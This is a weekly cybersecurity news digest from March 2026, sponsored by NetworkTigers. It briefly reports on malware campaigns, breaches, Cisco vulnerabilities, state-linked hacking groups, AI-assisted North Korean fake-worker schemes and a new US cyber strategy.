San Mateo, CA, March 16, 2026 — Stories, events, and developments that impacted the cybersecurity landscape last week, including emerging threats, policy changes, and industry responses.
WordPress Sites Hijacked for ClickFix Malware
Rapid7 says a large-scale cybercrime campaign has hijacked more than 250 legitimate WordPress sites across at least 12 countries to trick visitors into infecting themselves with infostealer malware. Victims are shown fake Cloudflare CAPTCHA pages that use ClickFix-style prompts to persuade them to open the Windows Run box, paste a command, and launch a multistage download chain. Payloads linked to the campaign include Vidar Stealer, Impure Stealer, Vodka Stealer, and Double Donut, all designed to steal credentials, financial data, and digital wallet information. Researchers said the scale and spread of the compromises suggest a highly automated, long-term criminal operation. Rapid7 urged site administrators to patch outdated components, strengthen admin passwords, enable multifactor authentication, and reduce exposure of trusted systems before attackers exploit them further. Read more.
Hacker Accessed FBI Epstein Files
A foreign hacker breached the FBI’s New York field office in 2023 and accessed files tied to the bureau’s Jeffrey Epstein investigation after a vulnerable server at the Child Exploitation Forensic Lab was left exposed. Reuters, citing an unnamed source and court documents, said the intruder reviewed certain Epstein-related files before the FBI detected and contained the incident. The bureau said it determined the breach was isolated, cut off the attacker’s access, and remediated the affected network. “Following the 2023 cyber incident, the FBI contained the affected network and determined the incident to be an isolated one. The FBI restricted access to the malicious actor and rectified the network,” an FBI spokesperson said. One unusual detail underscores the severity and confusion of the intrusion. According to Reuters, the hacker allegedly did not realize the target was the FBI until agents invited them onto a video call and identified themselves. Read more.
Russian hacker group Sednit reappears with new tools
The Russia-linked Sednit hacker group is again deploying custom malware in cyber-espionage campaigns against Ukrainian targets after years of relying on simpler phishing-delivered tools. ESET found the group using two implants in parallel: BeardShell, a new PowerShell-based backdoor that communicates via Icedrive, and Covenant, a heavily modified open-source .NET framework that now appears to be Sednit’s main espionage platform. Researchers said the dual-tool approach makes detection and takedown harder because each implant uses a different legitimate cloud infrastructure for command-and-control. Sednit also appears to be investing heavily in development, rapidly updating loaders and reverse-engineering services without public APIs. Initial access often comes through social engineering on Signal or WhatsApp, sometimes reinforced by phone calls. The shift suggests renewed investment in stealth, persistence, and wartime intelligence collection. Read more.
Iran-Linked Hackers Hit Medical Tech Firm
An Iranian-linked cyber incident at medical technology giant Stryker shows how geopolitical conflict can spill directly into healthcare operations and global supply chains. The Handala hacker group claimed it wiped more than 200,000 systems and stole 50TB of data, while Stryker confirmed a major disruption to its Microsoft environment in an SEC filing. The company said there is no sign of ransomware or malware, but access to key systems and business applications has been disrupted and restoration timing remains unclear. Researchers said Handala’s behavior looks more like Iranian state activity than independent hacktivism, with some pointing to possible abuse of Microsoft Intune to carry out destructive actions at scale. As Huntress CISO Chris Henderson warned, “healthcare organizations are directly in the crossfire whether they realize it or not.” Read more.
FBI: In the age of AI, security basics still matter the most
FBI officials say AI is making cyberattacks faster, not fundamentally different, which means the best defense is still the same set of basic security measures security teams have long been told to get right. Speaking at Billington Cybersecurity, deputy assistant director Jason Bilnoski said that while criminal and nation-state actors are using AI to enhance their attacks, intrusion patterns have changed little. He urged organizations not to fixate on AI’s speed and capabilities, but instead to focus on fundamentals that can stop intrusions before they start. “Identity is the new perimeter. You’re hunting legitimate traffic on your network,” Bilnoski said. “So we’re no longer seeing malware drop. We’re no longer seeing these very noisy TTPs [tactics, techniques and procedures]. It’s legitimate credentials moving laterally throughout the network, as if it’s a legitimate user on the network.” Read more.
Cisco Warns of IOS XR Privilege Escalation Flaws
Cisco is warning customers to patch two newly disclosed privilege-escalation flaws in IOS XR Software that could let low-privileged local attackers take over affected routing devices. CVE-2026-20040 allows arbitrary command execution as root because the software does not properly validate user-supplied arguments in certain CLI commands. CVE-2026-20046, which affects IOS XRv 9000 Routers, allows attackers to bypass task group authorization checks and gain full administrative control by exploiting incorrectly mapped CLI permissions. Cisco said the bugs were found during internal security testing and can be exploited independently, meaning attackers do not need to chain them together. IOS, IOS XE, and NX-OS are not affected. Cisco has released fixed software and urged admins to upgrade immediately, especially because CVE-2026-20040 has no workaround for exposed production networks. Read more.
BlackSanta Malware Campaign Targets HR
Russian-speaking threat actors are exploiting routine HR hiring workflows to slip BlackSanta malware into enterprise environments through resume-themed ISO files hosted on trusted cloud services. When opened, the file triggers a malicious shortcut that launches an obfuscated PowerShell script, extracts payloads hidden in image files via steganography, and sideloads a rogue DLL through legitimate signed software. Aryaka said the malware then checks for sandboxes, debuggers, virtual machines and other analysis environments before deploying a BYOVD-based EDR killer. Once active, BlackSanta can terminate antivirus processes, shut down EDR agents, weaken Microsoft Defender, suppress logging and reduce security console visibility, clearing the way for covert data theft over HTTPS. Read more.
Russian Operatives Hijack Signal and WhatsApp Accounts
Dutch intelligence says Russian state operatives are running a large-scale campaign to hijack Signal and WhatsApp accounts belonging to government employees, military personnel, journalists and other high-value targets. The attacks rely on familiar social engineering, including fake Signal Support messages that ask victims for verification codes or PINs, and malicious QR codes or links that abuse the apps’ linked device feature. Dutch officials warned that end-to-end encryption does not make consumer messaging platforms suitable for classified, confidential or sensitive communications. They advised users to watch for duplicate contacts in group chats and suspicious account name changes, such as “Deleted account,” which can signal compromise. Read more.
North Korea Using AI to Boost Fake Worker Schemes
North Korean threat groups are using AI to make their remote worker campaigns faster, broader, and harder to detect, according to Microsoft Threat Intelligence. Microsoft said groups including Coral Sleet, Sapphire Sleet, and Jasper Sleet are using generative AI to build convincing job-seeker personas, research hiring trends, create multilingual phishing lures, alter stolen identity documents, and sustain long-term employment at victim companies. Jasper Sleet has also used AI tools to answer technical questions, generate code, and produce professional workplace communications after operatives are hired, helping them blend in and avoid scrutiny. Microsoft warned that AI is now a “force multiplier” across the attack lifecycle, from initial access to post-compromise activity. It said experiments with agentic AI could eventually make these operations more adaptive and dangerous. Read more.
Trump administration reveals new cybersecurity strategy
The Trump administration has released a new national cyber strategy that casts cybersecurity as a core part of U.S. economic strength, national security, and technological leadership. Published March 6, 2026, the plan lays out six pillars: shaping adversary behavior through cyber operations, streamlining regulations, modernizing federal networks, protecting critical infrastructure and supply chains, maintaining leadership in AI and quantum computing, and expanding the cyber workforce. The White House says the strategy favors proactive disruption over reactive defense, including offensive cyber operations, law enforcement, and sanctions to deter attacks and break up criminal networks. Suzu Labs CEO Michael Bell said, “The six pillars are the right priorities, and the strategy reads like people who understand the threat landscape were involved in writing it. Post-quantum cryptography, private sector offensive operations, regulatory streamlining, AI security. All correct […] but a strategy without a budget is a press release.” Read more.
More cybersecurity news
- Last week’s news
- More cybersecurity news
- All articles sponsored by NetworkTigers
About NetworkTigers
NetworkTigers is the leader in the secondary market for Grade A, seller-refurbished networking equipment. Founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms, NetworkTigers provides consulting and network equipment to global governmental agencies, Fortune 2000, and healthcare companies. www.networktigers.com.
